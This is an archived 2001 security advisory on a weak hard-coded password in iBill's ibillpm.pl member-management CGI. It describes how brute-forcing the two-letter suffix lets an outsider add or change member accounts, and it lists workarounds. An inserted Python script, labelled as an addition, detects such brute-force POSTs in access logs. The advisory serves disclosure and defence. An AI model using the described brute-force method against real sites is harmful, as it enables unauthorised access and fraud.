SecurityTracker.com
SecurityTracker Archives

Category: Application (Commerce) > iBill
Vendors: Internet Billing Company (iBill)
iBill Internet Commerce Billing System Uses Weak Authentication Method in the Default Configuration, Allowing Remote Users to Modify User Accounts on the System
SecurityTracker Alert ID: 1002642
SecurityTracker URL: http://securitytracker.com/id/1002642
CVE Reference: GENERIC-MAP-NOMATCH
Date: Oct 26 2001
Impact: Modification of user information, User access via network
Exploit Included: Yes

Description:   A vulnerability was reported in the iBill Internet commerce billing system. Weak authentication allows remote users to modify the system configuration.

It is reported that iBill uses a weak password authentication method for the "ibillpm.pl" Perl-based user management script, part of the Password Management system. The weak password is reportedly based on a customer-specific fixed value plus two lowercase letters.

A remote user can feasibly conduct a brute force attack, generating POST messages to guess the password and add, delete, or change the password of users in the .htpasswd file.

It is also reported that the software does not log POST data and does not track username changes.

This vulnerability affects users that use iBill's Password Management system in the default configuration.

Demonstration exploit code is provided in the Source Message.

Impact:   A remote user can add an arbitrary username and password to a web site's "member" section.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following workarounds:

"1) Move the script to a less obvious place than the default so it's harder to find (don't forget to change the path at the iBill admin website).
2) Request that iBill set a more secure password for the ibillpm.pl script.
3) Change your webserver config (httpd.conf for Apache) to only allow addresses from .ibill.com to access the path to ibillpm.pl. See your webserver documentation for details on how to do this."
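The description above notes that the web server log records only a stream of 200-status POSTs to ibillpm.pl and none of the POST data, so the usable detection signal is the volume of POSTs to that path per client address. The following is an added example, not part of the advisory or the reporter's message, that flags that pattern in Apache combined-format access-log lines; the script path /cgi-bin/ibillpm.pl, the 20-requests-in-60-seconds threshold and the log lines themselves are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log format. POST bodies (username, password guess,
# action) are never logged, so the only visible signal is POST volume per client.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LOG_RE.match(line)          # None for lines that are not combined format
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_bruteforce(lines, script="ibillpm.pl", threshold=20, window_s=60):
    """Return {ip: total POSTs} for clients that POST to `script` at least
    `threshold` times inside any `window_s`-second sliding window. The status
    code is ignored: the script answers 200 to every guess, so it carries no signal."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith(script):
            per_ip[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        left = 0
        for right, t in enumerate(stamps):
            while (t - stamps[left]).total_seconds() > window_s:
                left += 1
            if right - left + 1 >= threshold:
                hits[ip] = len(stamps)
                break
    return hits

# Constructed sample lines (not real traffic): 25 POSTs in under a minute from
# one client, plus one legitimate POST and one GET from a second client.
SAMPLE = [
    f'203.0.113.9 - - [26/Oct/2001:10:15:{s:02d} -0400] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 512'
    for s in range(0, 50, 2)
] + [
    '198.51.100.4 - - [26/Oct/2001:10:16:00 -0400] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 512',
    '198.51.100.4 - - [26/Oct/2001:10:16:05 -0400] "GET /signup.html HTTP/1.0" 200 2048',
]
```

Running `find_bruteforce(SAMPLE)` reports the first client with 25 POSTs; tune `threshold` and `window_s` to the legitimate change rate of your own member management.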

Vendor URL: www.ibill.com/
Cause: Authentication error
Underlying OS: Linux (Any), UNIX (Any)
Underlying OS Comments: Perl-based

Message History:   None.


 Source Message Contents

Subject:  Weak authentication in iBill's Password Management CGI



Vulnerable Program: ibillpm.pl Perl CGI script
Distributed by: iBill Internet Billing Company, http://www.ibill.com

Problem: iBill hard codes a weak password for the user management script,
ibillpm.pl, installed for clients that use the Password Management system.
The weak password is the client's MASTER_ACCOUNT (which can be viewed in
the HTML of the site's signup pages) plus only 2 letters that are
lower-case (aa - zz). This allows a brute force POST to easily
add/delete/chgpwd of users in the .htpasswd file. The CGI keeps no
auditing record of what changes it makes, nor does the web log file
indicate what username was added to the system (doesn't log POST data). In
addition, the requests in the web log file all have HTTP response code
200, which usually doesn't indicate problems in error_log.

Impact: This allows an attacker to bypass the billing system and add an
arbitrary username/password to a website's "member" section. Thousands are
estimated to use the default setup.

Vulnerable Applications: Websites that use iBill's Password Management CGI
script, ibillpm.pl, using default setup process performed by iBill.
Vulnerable OS: Unix based.

Non-vulnerable Applications: Websites that do not use iBill's Password
Management system, or use more secure settings other than default.
Non-vulnerable OS: WindowsNT/2000 or other systems not capable of running
ibillpm.pl Perl CGI.

How this was found: During installation and security audit for a client's
website.

Workarounds:
1) Move the script to a less obvious place than the default so it's harder
to find (don't forget to change the path at the iBill admin website).
2) Request that iBill set a more secure password for the ibillpm.pl
script.
3) Change your webserver config (httpd.conf for Apache) to only allow
addresses from .ibill.com to access the path to ibillpm.pl. See your
webserver documentation for details on how to do this.


See attached exploit source code.




 
 


Copyright 2019, SecurityGlobal.net LLC